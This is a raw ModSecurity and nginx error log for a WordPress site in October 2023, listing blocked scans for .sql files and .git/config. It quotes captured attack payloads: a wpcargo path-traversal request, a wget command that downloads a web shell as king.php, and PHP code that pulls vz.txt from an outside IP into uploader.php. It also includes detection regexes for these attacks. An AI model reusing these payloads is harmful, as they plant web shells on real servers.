.backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ranger.sql"] [unique_id "ZSFJdVikIJEBkl3YyC7xvQAAAJE"] [Sat Oct 07 09:23:37.924787 2023] [:error] [pid 22204:tid 140671721633536] [client 82.64.222.50:37810] [client 82.64.222.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/daniel.sql"] [unique_id "ZSFp6XZLNhnu9bU2GHJjBAAAAM0"] [Sat Oct 07 11:41:51.555857 2023] [:error] [pid 21615:tid 140671730026240] [client 121.66.17.147:41144] [client 121.66.17.147] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/starwars.sql"] [unique_id "ZSGKTyIFOOiVB4yDnnEfkwAAAEw"] [Sat Oct 07 14:03:55.733426 2023] [:error] [pid 21616:tid 140671646099200] [client 118.163.251.59:43334] [client 118.163.251.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/klaster.sql"] [unique_id "ZSGrm1ikIJEBkl3YyC70YwAAAJY"] [Sat Oct 07 16:10:46.253315 2023] [:error] [pid 21614:tid 140671755204352] [client 20.210.204.17:45348] [client 20.210.204.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "ZSHJVo4Vs7TcDH5etrTXKQAAAAk"], referer: www.google.com [Sat Oct 07 16:10:47.443170 2023] [:error] [pid 21616:tid 140671679670016] [client 20.210.204.17:45350] [client 20.210.204.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "ZSHJV1ikIJEBkl3YyC71KgAAAJI"], referer: www.google.com [Sat Oct 07 16:26:42.267702 2023] [:error] [pid 21615:tid 140671771989760] [client 14.48.28.154:45656] [client 14.48.28.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/112233.sql"] [unique_id "ZSHNEiIFOOiVB4yDnnEgUAAAAEc"] [Sat Oct 07 18:01:05.389430 2023] [:error] [pid 21616:tid 140671901492992] [client 174.138.21.208:46838] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ .php [Sat Oct 07 18:01:05.630416 2023] [:error] [pid 21615:tid 140671671277312] [client 174.138.21.208:46842] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dx.php [Sat Oct 07 18:50:51.572892 2023] [:error] [pid 21614:tid 140671679670016] [client 88.132.48.228:48064] [client 88.132.48.228] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/george.sql"] [unique_id "ZSHu244Vs7TcDH5etrTXswAAABI"] [Sat Oct 07 21:15:24.906877 2023] [:error] [pid 22204:tid 140671876314880] [client 81.94.73.180:50224] [client 81.94.73.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/asshole.sql"] [unique_id "ZSIQvHZLNhnu9bU2GHJp1gAAAMM"] [Sat Oct 07 23:38:41.971876 2023] [:error] [pid 21615:tid 140671746811648] [client 121.66.17.147:52426] [client 121.66.17.147] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/computer.sql"] [unique_id "ZSIyUSIFOOiVB4yDnnEhwgAAAEo"] [Sun Oct 08 02:04:01.445757 2023] [:error] [pid 21615:tid 140671780382464] [client 75.41.146.98:57630] [client 75.41.146.98] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/michelle.sql"] [unique_id "ZSJUYSIFOOiVB4yDnnEjBQAAAEY"] [Sun Oct 08 04:35:27.946757 2023] [:error] [pid 15688:tid 140169134991104] [client 94.199.193.98:59908] [client 94.199.193.98] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/jessica.sql"] [unique_id "ZSJ336h0dhSWpZ9FHxVeQgAAAIg"] [Sun Oct 08 07:03:18.642473 2023] [:error] [pid 16546:tid 140169223776000] [client 104.35.37.244:33860] [client 104.35.37.244] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/pepper.sql"] [unique_id "ZSKahtHTPcYRUzZiMbWFCAAAAMY"] [Sun Oct 08 09:20:47.994895 2023] [:error] [pid 15688:tid 140169101420288] [client 20.210.204.17:36028] [client 20.210.204.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZSK6v6h0dhSWpZ9FHxVf3AAAAIw"], referer: www.google.com [Sun Oct 08 09:34:26.484344 2023] [:error] [pid 15688:tid 140169084634880] [client 114.79.137.190:36292] [client 114.79.137.190] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/1111.sql"] [unique_id "ZSK98qh0dhSWpZ9FHxVf4QAAAI4"] [Sun Oct 08 12:03:20.422669 2023] [:error] [pid 15687:tid 140169034278656] [client 59.149.113.112:38388] [client 59.149.113.112] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/zxcvbn.sql"] [unique_id "ZSLg2KV9WWBs12_UnA2FwwAAAFQ"] [Sun Oct 08 14:32:16.475654 2023] [:error] [pid 16546:tid 140169025885952] [client 24.206.35.218:40576] [client 24.206.35.218] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/555555.sql"] [unique_id "ZSMDwNHTPcYRUzZiMbWIugAAANU"] 2023/10/08 21:34:59 [error] 15552#15552: *309121 access forbidden by rule, client: 199.249.230.119, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/10/08 21:34:59 [error] 15552#15552: *309124 access forbidden by rule, client: 109.104.153.22, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/10/08 21:35:00 [error] 15552#15552: *309125 access forbidden by rule, client: 185.220.101.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/10/08 21:35:02 [error] 15553#15553: *309129 access forbidden by rule, client: 109.70.100.6, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Oct 08 22:03:58.844736 2023] [:error] [pid 15686:tid 140169101420288] [client 125.228.72.220:46584] [client 125.228.72.220] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/freedom.sql"] [unique_id "ZSNtnms2LuzMZ1GEEDmHyQAAAAw"] [Sun Oct 08 23:04:34.772678 2023] [:error] [pid 16546:tid 140169143383808] [client 20.169.255.216:47474] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Oct 08 23:04:47.418267 2023] [:error] [pid 15688:tid 140169101420288] [client 20.169.255.216:47476] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Oct 09 00:35:28.272107 2023] [:error] [pid 15688:tid 140169051064064] [client 118.163.251.59:48976] [client 118.163.251.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/777777.sql"] [unique_id "ZSORIKh0dhSWpZ9FHxVkXwAAAJI"] [Mon Oct 09 03:15:19.179212 2023] [:error] [pid 15687:tid 140169000707840] [client 195.235.98.146:51520] [client 195.235.98.146] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/pass.sql"] [unique_id "ZSO2l6V9WWBs12_UnA2H6AAAAFg"] [Mon Oct 09 05:54:37.752412 2023] [:error] [pid 21882:tid 139839848515328] [client 223.197.152.234:54624] [client 223.197.152.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/fuck.sql"] [unique_id "ZSPb7Va_dqQsXv6ZsFKR6AAAABU"] [Mon Oct 09 06:32:58.933878 2023] [:error] [pid 21884:tid 139839907264256] [client 192.42.116.197:55178] [client 192.42.116.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 